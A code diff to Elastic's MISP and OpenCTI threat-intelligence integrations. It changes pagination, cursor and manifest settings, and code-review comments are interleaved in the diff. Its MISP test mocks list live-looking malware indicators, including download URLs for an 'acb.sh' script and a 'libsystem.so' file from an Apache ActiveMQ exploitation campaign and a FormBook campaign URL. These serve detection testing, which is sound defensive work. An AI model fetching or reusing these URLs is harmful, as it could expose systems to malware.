"type:OSINT", + "colour": "#004646", + "numerical_value": null, + "inherited": 1 }, - "Tag": [ - { - "id": "10", - "name": "type:OSINT", - "colour": "#004646", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "204", - "name": "osint:lifetime=\"perpetual\"", - 
"colour": "#0071c3", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "540", - "name": "osint:certainty=\"50\"", - "colour": "#0087e8", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "11", - "name": "tlp:white", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "1051", - "name": "tlp:clear", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "338", - "name": "misp-galaxy:tool=\"FormBook\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "1056", - "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1566.001\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "474", - "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - } - ] + { + "id": "204", + "name": "osint:lifetime=\"perpetual\"", + "colour": "#0071c3", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "540", + "name": "osint:certainty=\"50\"", + "colour": "#0087e8", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "11", + "name": "tlp:white", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "1051", + "name": "tlp:clear", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "338", + "name": "misp-galaxy:tool=\"FormBook\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "1056", + "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1566.001\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "474", + "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + } + ] + }, + { + "id": "266793", + "event_id": "1279", + "object_id": "0", + "object_relation": null, + 
"category": "Network activity", + "type": "url", + "to_ids": true, + "uuid": "efa8a550-bc25-4d93-abcd-1c00eaa4acdd", + "timestamp": "1686914588", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "http://www.blueridgebedracks.com/km37/", + "decay_score": [ + { + "score": -0, + "base_score": 0, + "decayed": false, + "DecayingModel": { + "id": "1", + "name": "test-decay-model" + } + }, + { + "score": 0, + "base_score": 50, + "decayed": false, + "DecayingModel": { + "id": "2", + "name": "test-decay-model-2" + } + } + ], + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1279", + "info": "FormBook campaign", + "orgc_id": "3", + "uuid": "f45fe125-7f3f-4335-bf74-5ab61eb5b645" }, - { - "id": "268570", - "event_id": "1294", - "object_id": "0", - "object_relation": null, - "category": "Network activity", - "type": "url", - "to_ids": true, - "uuid": "28f55810-c61e-42d0-8565-cc7d2e7eb57c", - "timestamp": "1700667504", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "http://194.38.22.53/libsystem.so", - "decay_score": [ - { - "score": 49.98530793883329, - "base_score": 50, - "decayed": false, - "DecayingModel": { - "id": "2", - "name": "test-decay-model-2" - } - } - ], - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1294", - "info": "CVE-2023-46604 (Apache ActiveMQ) Vulnerability Exploited to Infect Systems With Cryptominers and Rootkits", - "orgc_id": "3", - "uuid": "df7b7020-9f17-4a3c-9824-1baa4ff67cb1" + "Tag": [ + { + "id": "10", + "name": "type:OSINT", + "colour": "#004646", + "numerical_value": null, + "inherited": 1 }, - "Tag": [ - { - "id": "10", - "name": "type:OSINT", - "colour": "#004646", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "204", - "name": "osint:lifetime=\"perpetual\"", 
- "colour": "#0071c3", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "11", - "name": "tlp:white", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "1051", - "name": "tlp:clear", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "713", - "name": "misp-galaxy:mitre-attack-pattern=\"Resource Hijacking - T1496\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - } - ] + { + "id": "204", + "name": "osint:lifetime=\"perpetual\"", + "colour": "#0071c3", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "540", + "name": "osint:certainty=\"50\"", + "colour": "#0087e8", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "11", + "name": "tlp:white", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "1051", + "name": "tlp:clear", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "338", + "name": "misp-galaxy:tool=\"FormBook\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "1056", + "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1566.001\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "474", + "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + } + ] + }, + { + "id": "268565", + "event_id": "1294", + "object_id": "0", + "object_relation": null, + "category": "Network activity", + "type": "url", + "to_ids": true, + "uuid": "ec341f4e-0f70-4569-8ac5-e35465572726", + "timestamp": "1700667504", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "http://185.122.204.197/acb.sh", + "decay_score": [ + { + "score": 0, + "base_score": 0, + "decayed": true, + "DecayingModel": { + 
"id": "1", + "name": "test-decay-model" + } + }, + { + "score": 49.98530793883329, + "base_score": 50, + "decayed": false, + "DecayingModel": { + "id": "2", + "name": "test-decay-model-2" + } + } + ], + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1294", + "info": "CVE-2023-46604 (Apache ActiveMQ) Vulnerability Exploited to Infect Systems With Cryptominers and Rootkits", + "orgc_id": "3", + "uuid": "df7b7020-9f17-4a3c-9824-1baa4ff67cb1" }, - { - "id": "266922", - "event_id": "1279", - "object_id": "20246", - "object_relation": "sha1", - "category": "Payload delivery", - "type": "sha1", - "to_ids": true, - "uuid": "84850997-631c-44ea-ac71-5f8bb4e6e1f0", - "timestamp": "1696914151", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "c514799ffdc38d48b7e90b8b6a324c354d1fd2a2", - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1279", - "info": "FormBook campaign", - "orgc_id": "3", - "uuid": "f45fe125-7f3f-4335-bf74-5ab61eb5b645" + "Tag": [ + { + "id": "10", + "name": "type:OSINT", + "colour": "#004646", + "numerical_value": null, + "inherited": 1 }, - "Object": { - "id": "20246", - "distribution": "5", - "sharing_group_id": "0" + { + "id": "204", + "name": "osint:lifetime=\"perpetual\"", + "colour": "#0071c3", + "numerical_value": null, + "inherited": 1 }, - "Tag": [ - { - "id": "10", - "name": "type:OSINT", - "colour": "#004646", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "204", - "name": "osint:lifetime=\"perpetual\"", - "colour": "#0071c3", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "540", - "name": "osint:certainty=\"50\"", - "colour": "#0087e8", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "11", - "name": "tlp:white", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "1051", - "name": "tlp:clear", - "colour": "#ffffff", - 
"numerical_value": null, - "inherited": 1 - }, - { - "id": "338", - "name": "misp-galaxy:tool=\"FormBook\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "1056", - "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1566.001\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "474", - "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - } - ] - } + { + "id": "11", + "name": "tlp:white", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "1051", + "name": "tlp:clear", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "713", + "name": "misp-galaxy:mitre-attack-pattern=\"Resource Hijacking - T1496\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + } + ] + }, + { + "id": "268570", + "event_id": "1294", + "object_id": "0", + "object_relation": null, + "category": "Network activity", + "type": "url", + "to_ids": true, + "uuid": "28f55810-c61e-42d0-8565-cc7d2e7eb57c", + "timestamp": "1700667505", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "http://194.38.22.53/libsystem.so", + "decay_score": [ + { + "score": 49.98530793883329, + "base_score": 50, + "decayed": false, + "DecayingModel": { + "id": "2", + "name": "test-decay-model-2" + } + } + ], + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1294", + "info": "CVE-2023-46604 (Apache ActiveMQ) Vulnerability Exploited to Infect Systems With Cryptominers and Rootkits", + "orgc_id": "3", + "uuid": "df7b7020-9f17-4a3c-9824-1baa4ff67cb1" + }, + "Tag": [ + { + "id": "10", + "name": "type:OSINT", + "colour": "#004646", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "204", + "name": 
"osint:lifetime=\"perpetual\"", + "colour": "#0071c3", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "11", + "name": "tlp:white", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "1051", + "name": "tlp:clear", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "713", + "name": "misp-galaxy:mitre-attack-pattern=\"Resource Hijacking - T1496\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + } + ] + } ] } } - - path: /attributes/restSearch + - path: /attributes/restSearch # sequence 1, page 2 methods: ["POST"] request_headers: Authorization: "test" Content-Type: application/json - request_body: /^{"limit":"10","page":"2","returnFormat":"json","timestamp":"\d+"/ + request_body: /^{"includeDecayScore":"true","limit":"10","order":"timestamp","page":"2","returnFormat":"json","timestamp":"\d+"/ responses: - status_code: 200 body: "{\n \"response\": {\n \"Attribute\": []\n }\n} " + - path: /attributes/restSearch # sequence 1, page 1 + methods: ["POST"] + request_headers: + Authorization: "test" + Content-Type: application/json + request_body: /^{"includeDecayScore":"true","limit":"10","order":"timestamp","page":"1","returnFormat":"json","timestamp":"\d+"/ + responses: + - status_code: 200 + body: |- + { + "response": { + "Attribute": [ + { + "id": "1", + "event_id": "1", + "object_id": "0", + "object_relation": null, + "category": "External analysis", + "type": "link", + "to_ids": false, + "uuid": "542e4cbd-ee78-4a57-bfb8-1fda950d210b", + "timestamp": "1412320445", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "http://labs.opendns.com/2014/10/02/opendns-and-bash/", + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1", + "info": "OSINT ShellShock scanning IPs from OpenDNS", + "orgc_id": "2", + "uuid": 
"542e4c9c-cadc-4f8f-bb11-6d13950d210b" + } + }, + { + "id": "2", + "event_id": "1", + "object_id": "0", + "object_relation": null, + "category": "External analysis", + "type": "link", + "to_ids": false, + "uuid": "542e4cbe-d560-4e14-9157-1fda950d210b", + "timestamp": "1412320446", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "https://gist.github.com/andrewsmhay/de1cdc63d04c2bbf8c12", + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1", + "info": "OSINT ShellShock scanning IPs from OpenDNS", + "orgc_id": "2", + "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" + } + } + ] + } + } diff --git a/packages/ti_misp/changelog.yml b/packages/ti_misp/changelog.yml index 77aa7907576..6a5438b1a82 100644 --- a/packages/ti_misp/changelog.yml +++ b/packages/ti_misp/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "1.32.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 +- version: "1.31.0" + changes: + - description: Pagination fixes + type: enhancement + link: https://github.com/elastic/integrations/pull/9073 +- version: "1.30.1" + changes: + - description: Add recent new field to latest_ioc transform dest + type: enhancement + link: https://github.com/elastic/integrations/pull/8963 +- version: "1.30.0" + changes: + - description: Added attribute limit option to the UI + type: enhancement + link: https://github.com/elastic/integrations/pull/9064 - version: "1.29.1" changes: - description: Changed owners diff --git a/packages/ti_misp/data_stream/threat/_dev/test/system/test-default-config.yml b/packages/ti_misp/data_stream/threat/_dev/test/system/test-default-config.yml index c689b96f1a6..140488eddee 100644 --- a/packages/ti_misp/data_stream/threat/_dev/test/system/test-default-config.yml 
+++ b/packages/ti_misp/data_stream/threat/_dev/test/system/test-default-config.yml @@ -6,8 +6,8 @@ data_stream: preserve_original_event: true url: http://{{Hostname}}:{{Port}} api_token: test - interval: 10m - initial_interval: 10m + interval: 1s + initial_interval: 10s enable_request_tracer: true assert: hit_count: 3 diff --git a/packages/ti_misp/data_stream/threat/agent/stream/httpjson.yml.hbs b/packages/ti_misp/data_stream/threat/agent/stream/httpjson.yml.hbs index 50415377874..816476e4ce6 100644 --- a/packages/ti_misp/data_stream/threat/agent/stream/httpjson.yml.hbs +++ b/packages/ti_misp/data_stream/threat/agent/stream/httpjson.yml.hbs @@ -38,8 +38,16 @@ request.transforms: value: json - set: target: body.timestamp - value: '[[.cursor.timestamp.Unix]]' + value: >- + [[- if index .cursor "timestamp" -]] + [[- .cursor.timestamp -]] + [[- else -]] + [[- .last_response.url.params.Get "timestamp" -]] + [[- end -]] default: '[[ (now (parseDuration "-{{initial_interval}}")).Unix ]]' +- set: + target: body.order + value: timestamp - set: # Ignored by MISP, set as a workaround to make it available in response.pagination. target: url.params.timestamp diff --git a/packages/ti_misp/data_stream/threat/manifest.yml b/packages/ti_misp/data_stream/threat/manifest.yml index 063d60bab64..0872c8120e6 100644 --- a/packages/ti_misp/data_stream/threat/manifest.yml +++ b/packages/ti_misp/data_stream/threat/manifest.yml @@ -18,6 +18,7 @@ streams: required: true show_user: true description: The API token used to access the MISP instance. + secret: true - name: initial_interval type: text title: Initial interval diff --git a/packages/ti_misp/data_stream/threat_attributes/_dev/test/system/test-default-config.yml b/packages/ti_misp/data_stream/threat_attributes/_dev/test/system/test-default-config.yml index fa97cc16e46..b3996354802 100644 --- a/packages/ti_misp/data_stream/threat_attributes/_dev/test/system/test-default-config.yml 
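Review bot: The new `body.timestamp` template emits `.cursor.timestamp` verbatim where the old one called `.Unix` on it, so it now relies on the stored cursor already being an epoch-seconds string; this stream's `cursor:` stanza is outside the hunk, so confirm it was switched to `[[.last_event.timestamp]]` the way the threat_attributes stream is in this PR, otherwise a Go time value would be sent as the MISP `timestamp` filter. The added `body.order: timestamp` setter is what makes the last event of a page safe to use as the cursor, and that dependency deserves a comment on the setter: `# Ascending timestamp order is required: the cursor is seeded from the last event of the last page.` If MISP's `timestamp` filter is inclusive, as I believe it is, the next run will re-fetch at least the event that seeded the cursor; if that is intended, say so next to the cursor definition.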
+++ b/packages/ti_misp/data_stream/threat_attributes/_dev/test/system/test-default-config.yml @@ -6,8 +6,8 @@ data_stream: preserve_original_event: true url: http://{{Hostname}}:{{Port}} api_token: test - interval: 10m - initial_interval: 10m + interval: 1s + initial_interval: 10s enable_request_tracer: true ioc_expiration_duration: 5d assert: diff --git a/packages/ti_misp/data_stream/threat_attributes/agent/stream/httpjson.yml.hbs b/packages/ti_misp/data_stream/threat_attributes/agent/stream/httpjson.yml.hbs index 691caf70757..01dae70f968 100644 --- a/packages/ti_misp/data_stream/threat_attributes/agent/stream/httpjson.yml.hbs +++ b/packages/ti_misp/data_stream/threat_attributes/agent/stream/httpjson.yml.hbs @@ -30,9 +30,11 @@ request.transforms: - set: target: body.page value: 1 +{{#if limit}} - set: target: body.limit - value: 10 + value: {{limit}} +{{/if}} {{#if enforce_warning_list}} - set: target: body.enforceWarninglist @@ -43,7 +45,12 @@ request.transforms: value: json - set: target: body.timestamp - value: '[[.cursor.timestamp.Unix]]' + value: >- + [[- if index .cursor "timestamp" -]] + [[- .cursor.timestamp -]] + [[- else -]] + [[- .last_response.url.params.Get "timestamp" -]] + [[- end -]] default: '[[ (now (parseDuration "-{{initial_interval}}")).Unix ]]' - set: # Ignored by MISP, set as a workaround to make it available in response.pagination. @@ -52,6 +59,9 @@ request.transforms: - set: target: body.includeDecayScore value: true +- set: + target: body.order + value: timestamp response.split: target: body.response.Attribute @@ -72,7 +82,7 @@ response.pagination: value: '[[.last_response.url.params.Get "timestamp"]]' cursor: timestamp: - value: '[[.last_event.Attribute.timestamp]]' + value: '[[.last_event.timestamp]]' tags: {{#if preserve_original_event}} - preserve_original_event diff --git a/packages/ti_misp/data_stream/threat_attributes/manifest.yml b/packages/ti_misp/data_stream/threat_attributes/manifest.yml index 9c5324fc173..f9c1340eaa2 100644 
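Review bot: `value: {{limit}}` splices a policy variable into the generated YAML without quoting, and the companion manifest declares `limit` as `type: text`, so a non-numeric or multi-line value would yield a malformed or altered stream config instead of a validation error when the policy is saved. The system test regex shows the request carries `"limit":"10"` as a string anyway, so nothing is lost by tightening the input to an integer type in the manifest. A comment here would also record why the guard exists, e.g. `{{!-- limit is required in the manifest; the guard only covers policies created before the option existed --}}`, since otherwise an empty value silently falls back to MISP's server-side page size.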
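Review bot: The cursor now reads `.last_event.timestamp`, which matches the split target `body.response.Attribute` (each event is one attribute with `timestamp` at its top level), whereas the old `.last_event.Attribute.timestamp` would have resolved to nothing and left the cursor stuck on the initial-interval default. Because `body.timestamp` is seeded from this value and MISP's timestamp filter appears to be an inclusive lower bound, the first page of the next interval will start with the event that set the cursor; a one-line comment would save the next reader from chasing apparent duplicates: `# Inclusive lower bound: the event that seeded the cursor is returned again on the next run.`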
--- a/packages/ti_misp/data_stream/threat_attributes/manifest.yml +++ b/packages/ti_misp/data_stream/threat_attributes/manifest.yml @@ -18,6 +18,15 @@ streams: required: true show_user: true description: The API token used to access the MISP instance. + secret: true + - name: limit + type: text + title: Attributes Limit + multi: false + required: true + show_user: true + default: 10 + description: Configures how many attributes are returned for each API request. - name: initial_interval type: text title: Initial interval diff --git a/packages/ti_misp/elasticsearch/transform/latest_ioc/fields/ecs.yml b/packages/ti_misp/elasticsearch/transform/latest_ioc/fields/ecs.yml index 4719c670656..a9f7e59c644 100644 --- a/packages/ti_misp/elasticsearch/transform/latest_ioc/fields/ecs.yml +++ b/packages/ti_misp/elasticsearch/transform/latest_ioc/fields/ecs.yml @@ -78,3 +78,5 @@ name: organization.id - external: ecs name: labels +- name: threat.indicator.email.subject + type: keyword diff --git a/packages/ti_misp/elasticsearch/transform/latest_ioc/transform.yml b/packages/ti_misp/elasticsearch/transform/latest_ioc/transform.yml index e4ca3cf9cfb..545593ee0b4 100644 --- a/packages/ti_misp/elasticsearch/transform/latest_ioc/transform.yml +++ b/packages/ti_misp/elasticsearch/transform/latest_ioc/transform.yml @@ -33,4 +33,4 @@ retention_policy: _meta: managed: true # Bump this version to delete, reinstall, and restart the transform during package. - fleet_transform_version: 0.1.0 + fleet_transform_version: 0.1.1 diff --git a/packages/ti_misp/manifest.yml b/packages/ti_misp/manifest.yml index 339ba6ac9cc..1205dc0d9e4 100644 --- a/packages/ti_misp/manifest.yml +++ b/packages/ti_misp/manifest.yml 
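Review bot: `limit` is declared as `type: text` although the stream template interpolates it unquoted into the request body as a page size; declaring it `type: integer` lets Fleet validate the value in the policy editor and keeps a stray string from corrupting the rendered stream config. The description should also say what the value trades off, since nothing here bounds it: `description: Number of attributes requested per API call (page size). Larger values may increase memory use on the agent and load on the MISP server.` The `secret: true` flag on `api_token` is consistent with the same change in the threat stream's manifest.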
@@ -1,13 +1,13 @@ name: ti_misp title: MISP -version: "1.29.1" +version: "1.32.0" description: Ingest threat intelligence indicators from MISP platform with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: ["security", "threat_intel"] conditions: kibana: - version: ^8.11.0 + version: ^8.12.0 icons: - src: /img/misp.svg title: MISP diff --git a/packages/ti_opencti/_dev/build/docs/README.md b/packages/ti_opencti/_dev/build/docs/README.md index d988a3dcba7..70b171de2e9 100644 --- a/packages/ti_opencti/_dev/build/docs/README.md +++ b/packages/ti_opencti/_dev/build/docs/README.md @@ -15,7 +15,7 @@ Each event in the log data stream collected by the OpenCTI integration is an ind This integration requires Filebeat version 8.9.0, or later. -It was initially developed using OpenCTI version 5.10.1 and updated for verison 5.12.X. +It has been updated for OpenCTI version 5.12.24 and requires that version or later. ## Setup 
@@ -33,6 +33,18 @@ The `indicator` data stream includes indicators of the following types (`threat. OpenCTI's data model closely follows the [STIX standard](https://docs.oasis-open.org/cti/stix/v2.1/os/stix-v2.1-os.html). It supports complex indicators defined using STIX patterns or other languages, and each indicator can be related to one or more observables. In the [ECS threat fields](https://www.elastic.co/guide/en/ecs/current/ecs-threat.html) the focus is on atomic indicators. This integration fetches as much data as possible about indicators and their related observables, and populates relevant ECS fields wherever possible. It uses related observables rather than the indicator pattern as the data source for type-specific indicator fields. +#### Expiration of inactive indicators + +The `opencti.indicator.invalid_or_revoked_from` field is set to the earliest time at which an indicator reaches its `valid_until` time or is marked as revoked. From that time the indicator should no longer be considered active. + +An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created to provide a view of active indicators for end users. This transform creates destination indices that are accessible via the alias `logs-ti_opencti_latest.indicator`. When querying for active indicators or setting up indicator match rules, use that alias to avoid false positives from expired indicators. + +The dashboards show only active indicators, except the Ingestion dashboard, which shows data from both the source data stream and the indices of the latest indicators. + +Indicators that are never expired or revoked will not be removed from the indices of the latest indicators. If accumulation of indicators is a problem there, it can be managed upstream in OpenCTI, or by manually deleting indicators from those indices. 
+ +To prevent unbounded growth of the source data stream `logs-ti_opencti.indicator-*`, it has an index lifecycle management (ILM) policy that deletes records 5 days after ingestion. + #### Example Here is an example `indicator` event: @@ -57,6 +69,7 @@ Timestamps are mapped as follows: | modified | threat.indicator.modified_at | Time of the indicator's last modification | | valid_from | opencti.indicator.valid_from | Time from which this indicator is considered a valid indicator of the behaviors it is related to or represents | | valid_until | opencti.indicator.valid_until | Time at which this indicator should no longer be considered a valid indicator of the behaviors it is related to or represents | +| - | opencti.indicator.invalid_or_revoked_from | The earliest time at which an indicator reaches its `valid_until` time or is marked as revoked | The table below lists all `opencti.*` fields. diff --git a/packages/ti_opencti/_dev/deploy/docker/files/config.yml b/packages/ti_opencti/_dev/deploy/docker/files/config.yml index 1c6bfe9215b..b39471f4508 100644 --- a/packages/ti_opencti/_dev/deploy/docker/files/config.yml +++ b/packages/ti_opencti/_dev/deploy/docker/files/config.yml @@ -36,33 +36,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, 
@@ -109,33 +97,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -182,33 +158,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -277,33 +241,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, 
@@ -350,33 +302,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -423,33 +363,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -518,33 +446,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, 
@@ -591,30 +507,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "killChainPhases": { "edges": [] }, @@ -664,33 +571,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, diff --git a/packages/ti_opencti/changelog.yml b/packages/ti_opencti/changelog.yml index f75001e4580..8ca14f0917b 100644 --- a/packages/ti_opencti/changelog.yml +++ b/packages/ti_opencti/changelog.yml 
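Review bot: The `@@ -591,30 +507,21 @@` hunk leaves the mock response with two `killChainPhases` keys: the added `"killChainPhases": [],` is immediately followed by the unchanged `"killChainPhases": { "edges": [] }`, which every other hunk in this file removes. Depending on how the mock service parses the body, the later old-schema value will win or the fixture will be rejected, so this rule would still serve the pre-5.12.24 shape that the PR is meant to drop. Remove the three leftover lines `"killChainPhases": {`, `"edges": []`, `},` so the hunk matches its siblings.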
